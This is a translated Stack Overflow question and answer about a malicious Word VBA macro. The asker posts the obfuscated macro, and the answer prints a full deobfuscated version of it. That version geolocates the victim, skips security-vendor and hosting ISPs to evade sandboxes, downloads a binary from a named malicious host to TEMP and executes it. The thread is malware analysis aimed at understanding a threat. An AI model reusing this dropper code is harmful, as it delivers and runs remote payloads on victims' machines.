这个恶意vba代码到底是做什么的?

时间:2016-08-09 09:57:29

标签: vba ms-word word-vba

我刚刚在我的工作场所收到了这个基于宏的文档,里面有这个恶意的宏代码 由于vb.net不是我强大的一面,我无法弄清楚它的作用。 这是我在文档中找到的唯一宏 由于代码被强烈混淆,我认为它是恶意的。

Public Sub Document_Close()
On Error GoTo SWuc
ZQZf
Exit Sub
SWuc:
End Sub
Public Sub ZQZf()
Dim vmKT As String
Dim UwuV As String
Set PUQqU = CallByName(ThisDocument, s(61, "pocpiiAtlna", 107), 2)
If CallByName(PUQqU, s(74, "mrUaeeNs", 29), 2) = s(31, "RESU", 35) Then UWaFZ (s(40, "uadrBsm naee", 89))
If CallByName(CallByName(PUQqU, s(41, "liFtneceRse", 109), 2), s(33, "tonCu", 8), 2) < 3 Then UWaFZ (s(72, "sih daByrot", 32))
Set mVEL = qizB(s(271, "5n.tq.ipHetWtnRs1tipe.HWtu", 99))
CallByName mVEL, s(27, "nepO", 11), 1, s(28, "EGT", 8), s(414, "m/t///g.xwsei2ooi./ty1p/dawpmcvecmw:ht.imn", 151), False
CallByName mVEL, s(97, "qSeueaetdsReterH", 35), 1, s(62, "eeerrfR", 52), s(399, "arwmytxla/.es.eipicdwomha/-:dtew/-tmod/c-smnpsn", 452)
CallByName mVEL, s(97, "qSeueaetdsReterH", 35), 1, s(15, "AetgrUe-sn", 53), s(635, ".0 o t/61nIplt6WMoieT;;(oi .l0)Tw1i5.;dEaa/.iSmln   czdN0e Mrs0b", 221)
CallByName mVEL, s(11, "dneS", 11), 1
If CallByName(mVEL, s(13, "tSsuta", 11), 2) >= 400 Then UWaFZ (s(29, "'PnIa Cestsaecrodld at ", 67))
vmKT = CallByName(mVEL, s(115, "esnopseRtxeT", 71), 2)
For Each ofJE In OImbM
If InStr(LCase(vmKT), LCase(ofJE)) <> 0 Then UWaFZ (s(67, " daB:PSI", 23) & ofJE)
Next
CallByName mVEL, s(27, "nepO", 11), 1, s(28, "EGT", 8), s(237, "pnwm/cbtotoii.t/9cgf6h/9.cf1n:eo/oei", 101), False
CallByName mVEL, s(97, "qSeueaetdsReterH", 35), 1, s(15, "AetgrUe-sn", 53), s(635, ".0 o t/61nIplt6WMoieT;;(oi .l0)Tw1i5.;dEaa/.iSmln   czdN0e Mrs0b", 221)
CallByName mVEL, s(11, "dneS", 11), 1
If CallByName(mVEL, s(13, "tSsuta", 11), 2) >= 400 Then UWaFZ (s(261, "rCo  nniitoaeddyawbf'lnl a", 249))
Set zGFN = CallByName(qizB(s(108, "lpltW.SSchrei", 41)), s(97, "nemnorivnEt", 43), 2, s(17, "OSCPERS", 9))
UwuV = zGFN(s(23, "PMET", 7)) & CallByName(PUQqU, s(74, "arapeShtaProt", 77), 2) & s(46, "1tt83mm2.pp", 37)
Set wATB = qizB(s(128, "BmSDrDa.AtOe", 19))
CallByName wATB, s(17, "yTep", 11), 4, 1
CallByName wATB, s(27, "nepO", 11), 1
CallByName wATB, s(41, "rWeti", 29), 1, CallByName(mVEL, s(32, "BesyooseRndp", 101), 2)
CallByName wATB, s(35, "olaTiSeFev", 37), 1, UwuV, 2
CallByName wATB, s(8, "solCe", 14), 1
CallByName qizB(s(108, "lpltW.SSchrei", 41)), s(31, "cexE", 7), 1, UwuV
End Sub
Public Function OImbM()
OImbM = rHOu(Array(s(7, "MANOZA", 29), s(71, "OYOSNNMUA", 59), s(60, "DTNIEBFREED", 86), s(11, "ULBTAOC E", 26), s(101, "TSS SMIOYECCS", 139), _
s(41, "OCULD", 7), s(83, "EC ATADRETN", 109), s(15, "ECATADRETN", 69), s(107, "ARETENADTC", 93), s(47, "EADCDIEDT", 34), s(99, "P,SO ELSTE", 93), _
s(54, "IYREEFE", 9), s(17, "TRPNOEIFCO", 27), s(66, "ROFTENIT", 31), s(71, "EHRENZT", 69), s(16, "ETSOHD", 59), s(65, "SOHGNIT", 27), _
s(22, "ABEEESLW", 77), s(85, "COISMOTRF", 61), s(23, "ECROFN", 35), s(12, "SSV AOH", 74), s(95, "PNRFIPOOTO", 37), s(41, "ISUTERYC", 51), _
s(13, "ESREVR", 29), s(205, "HOGETL SNNICROTSOGE", 46), s(89, "RTEDMCORN I", 17), s(15, "AWTSURTEV", 62), s(19, "RAIO RNHEATMC", 75), _
s(44, "AUORCLPKEKBMCTASO", 80), s(25, "AMESICTM", 59), s(11, "RTORCIMDNE", 99)))
End Function
Public Sub UWaFZ(ByVal ltfqE As String)
Err.Raise Number:=2, Description:=ltfqE
End Sub
Public Function qizB(ByVal DVnR As String)
Set qizB = feZmA(CreateObject(DVnR))
End Function
Public Function feZmA(ByVal jfcO As Object)
Set feZmA = jfcO
End Function
Public Function rHOu(ByVal iMqIc)
rHOu = iMqIc
End Function
Public Function s(ByVal DDniC As Integer, ByVal Sfrf As String, ByVal QuJk As Integer) As String
Dim qnJn As Integer
qnJn = GzSvR(DDniC, Len(Sfrf))
Do While Len(s) < Len(Sfrf)
s = s & gOtmH(Sfrf, qnJn)
qnJn = GzSvR((qnJn + QuJk), Len(Sfrf))
Loop
End Function
Public Function gOtmH(ByVal vdHA As String, ByVal qnJn As Integer) As String
gOtmH = Right(Left(vdHA, qnJn + 1), 1)
End Function
Public Function GzSvR(ByVal JtMKn As Integer, ByVal PfnR As Integer) As Integer
GzSvR = JtMKn - (PfnR * (JtMKn \ PfnR))
End Function

1 个答案:

答案 0 :(得分:5)

警告:请勿运行此代码(或OP)

这是一个二进制下载程序,至少在VBA端是script-kiddie级代码。当我对它进行去混淆时,替换受损的名称,并将一些函数调用内联如下:

Public Sub Document_Close()
    On Error GoTo QuietExit
    MaliciousCode
    Exit Sub
QuietExit:
End Sub

Public Sub MaliciousCode()
    Err.Raise 666, , "Do not execute this."  'NOTE: I added this ;-)

    Dim response As String
    Dim filePath As String

    Set wdApp = ThisDocument.Application
    If wdApp.UserName = "USER" Then Err.Raise 2, "Bad username"
    If wdApp.RecentFiles.Count < 3 Then Err.Raise 2, "Bad history"

    Set webRequest = CreateObject("WinHttp.WinHttpRequest.5.1")
    webRequest.Open "GET", "https://www.maxmind.com/geoip/v2.1/city/me", False
    webRequest.SetRequestHeader "Referer", "https://www.maxmind.com/en/locate-my-ip-address"
    webRequest.SetRequestHeader "User-Agent", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
    webRequest.Send

    If webRequest.Status >= 400 Then Err.Raise 2, "Can't locate IP address"

    response = webRequest.ResponseText
    For Each isp In GetBadISPList
        If InStr(LCase(response), LCase(isp)) <> 0 Then Err.Raise 2, "Bad ISP: " & isp
    Next

    webRequest.Open "GET", "http://one99two.com/cgi/office16.bin", False
    webRequest.SetRequestHeader "User-Agent", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
    webRequest.Send

    If webRequest.Status >= 400 Then Err.Raise 2, "Can't download binary file"

    Set env = CreateObject("WScript.Shell").Environment("PROCESS")
    filePath = env("TEMP") & wdApp.PathSeparator & "tmp8213.tmp"
    Set outStream = CreateObject("ADODB.Stream")
    outStream.Type = adTypeBinary
    outStream.Open
    outStream.Write webRequest.ResponseBody
    outStream.SaveToFile
    outStream.Close

    CreateObject("WScript.Shell").Exec filePath
End Sub

Public Function GetBadISPList()
    GetBadISPList = Array("AMAZON", "ANONYMOUS", "BITDEFENDER", "BLUE COAT", "CISCO SYSTEMS", _
                       "CLOUD", "DATA CENTER", "DATACENTER", "DATACENTRE", "DEDICATED", "ESET, SPOL", _
                       "FIREEYE", "FORCEPOINT", "FORTINET", "HETZNER", "HOSTED", "HOSTING", _
                       "LEASEWEB", "MICROSOFT", "NFORCE", "OVH SAS", "PROOFPOINT", "SECURITY", _
                       "SERVER", "STRONG TECHNOLOGIES", "TREND MICRO", "TRUSTWAVE", "NORTH AMERICA", _
                       "BLACKOAKCOMPUTERS", "MIMECAST", "TRENDMICRO")
End Function

下载网站已在巴基斯坦注册,并被Google标记为恶意网站。请注意,我最初怀疑它是一个bot-net安装程序是基于获取IP地址,但它看起来像是一种原始的尝试,以避免在托管平台和AV提供程序域上运行。二进制文件实际上可以是任何东西。

Virustotal没有点击文件的原因显然是由于混淆。上面的代码actually does get some hits